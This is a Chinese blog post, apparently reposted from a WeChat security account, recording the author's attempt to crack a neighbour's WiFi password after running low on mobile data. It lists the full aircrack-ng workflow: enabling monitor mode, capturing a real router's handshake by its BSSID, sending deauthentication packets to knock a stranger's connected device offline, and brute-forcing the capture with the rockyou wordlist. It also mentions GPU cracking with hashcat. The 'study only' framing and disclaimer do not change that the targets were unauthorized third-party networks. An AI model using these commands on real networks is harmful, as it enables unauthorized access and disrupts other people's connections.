WiFi密码破解学习记录

admin 2022年6月1日09:43:53移动安全评论21 views2026字阅读6分45秒阅读模式

0x01 前言

新搬的地方还没有安装WIFI,流量手机流量快烧完了,看着附近的WIFI,很是心动。于是上网搜索了一下教程进行试验,试验过程和结果,仅作为学习记录。


0x02 实验环境

台式机Kali虚拟机无线网卡菜鸡一只


0x03 实验过程

一、无线网卡安排

1.主机USB接口直接怼入无线网卡,Kali虚拟机弹窗提示,选择连接到虚拟机,选中Kali,点击确定。(看到有些教程说需要安装驱动,这可能跟所购买的无线网卡是否免驱有关,我这里是免驱版的,直接怼入即可使用。)

WiFi密码破解学习记录


2.1.此时在Kali的网络连接处就可以看到,虚拟机可以搜索到附近的WIFI。说明网卡怼入成功。

WiFi密码破解学习记录


2.2.打开终端输入ifconfig查看网卡,存在wlan0。也说明网卡怼入成功。

WiFi密码破解学习记录


2.3.终端输入iwconfig,存在网卡wlan0,也说明网卡怼入成功。

WiFi密码破解学习记录


2.4.虚拟机检查可移动设备,可以清楚的看到无线网卡的型号。也是说明网卡怼入成功。

WiFi密码破解学习记录


二、握手包抓取

1.1.输入命令,清除系统中可能影响监听的进程:

airmon-ng check kall


1.2.开启网卡监听:

airmon-ng start wlan0


1.3.检查是否成功开启监听:(可以看到wlan0变成了wlan0mon,说明成功开启监听模式)

iwconfig
WiFi密码破解学习记录


2.开始探测附近的WIFI:

airodump-ng wlan0mon

主要看三个参数:

  • BSSID:路由器的MAC地址

  • PWR:信号值,绝对值越低,说明信号越强

  • CH:当前路由器使用的信道

WiFi密码破解学习记录


3.找一个信号比较强的WIFI进行监听,这里选择了一个小米的WIFI,BSSID为:64:64:4A:E3:90:41,使用的信道为1,输入命令,开始监听:

airodump-ng --bssid 64:64:4A:E3:90:41 -c 1 -w test wlan0mon

参数说明:

  • –bssid:路由器的MAC地址

  • -c:路由器使用的信道

  • -w:抓取的握手包名称,可以选择输出的路径,这里使用默认输出路径为根目录


下图说明:BSSID为路由器MAC地址,STATION为当前连接在路由器上的设备的MAC地址

WiFi密码破解学习记录

4.另外再打开一个终端,对当前正在连接的某个设备进行攻击,使其断开与路由器的连接。(原理没有深究,大概使向目标发送大量数据,或者类似于ARP欺骗的攻击,使设备与路由器断开连接,停止攻击后,设备会自动连接上路由器,此时就可以抓取到握手包。)
aireplay-ng -0 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0monoraireplay-ng --deauth 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0mon
参数说明:
  • -0、–deauth:指定对目标进行攻击的次数

  • -a:路由器的MAC地址

  • -c:目标MAC地址

WiFi密码破解学习记录

5.等待攻击完成,此时在第一个终端会显示握手包抓取成功,如下图:
WiFi密码破解学习记录

6.在根目录生成有一些握手包文件,其中包含test-01.cap
WiFi密码破解学习记录

二、爆破开启
1.在终端输入命令:
aircrack-ng -w /usr/share/wordlists/rockyou.txt test-01.cap
参数说明:
  • -w:指定一个密码文件,这里使用的是Kali自带的密码文件,可以在文件系统中找到。


PS:我一开始使用此命令时报错,缺少-w参数,然后进入密码存放文件路径中发现,自带的密码是一个压缩包,需要先解压才能用,源文件为:rockyou.txt.gz。后面的.cap文件,如果一开始更改的存放的位置需要加上完整的路径
WiFi密码破解学习记录

0x04 实验结果

1.等待爆破结束:(很遗憾,密码字典不够强大,没有爆破出来,密码正确会显示在终端)
WiFi密码破解学习记录

0x05 个人总结

感觉就是学习了一个工具的大概使用过程,aircrack-ng原理是使用CPU去跑包,全程不需要联网,破解速度看个人CPU的性能。

此间还看到了一个利用显卡GPU去跑字典的教程,前期一样的是抓取握手包,然后使用hashcat这个工具进行爆破,据说速度比aircrack-ng快的多。还有一些其他的工具,如:EWSA(与hashcat原理差不多)

一样做了试验,但是hashcat没跑起来,原因是:我的电脑显卡是集成显卡,太垃圾了。需要独立显卡才可以跑

文章来源 :FreeBuf原文链接:https://www.freebuf.com/articles/wireless/279484.html


WiFi密码破解学习记录


WiFi密码破解学习记录

推荐阅读   

【入门教程】常见的Web漏洞--XSS

【入门教程】常见的Web漏洞--SQL注入

sql注入--入门到进阶

短信验证码安全常见逻辑漏洞

最全常见Web安全漏洞总结及推荐解决方案

常见的Web应用的漏洞总结(原理、危害、防御)

代码审计常见漏洞总结

Web安全漏洞的靶场演示

13 款 Linux 比较实用的工具

xss攻击、绕过最全总结


WiFi密码破解学习记录

   学习更多技术,关注我:   

觉得文章不错给点个‘再看’吧

原文始发于微信公众号(编码安全研究):WiFi密码破解学习记录

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月1日09:43:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  WiFi密码破解学习记录 https://cn-sec.com/archives/1074557.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: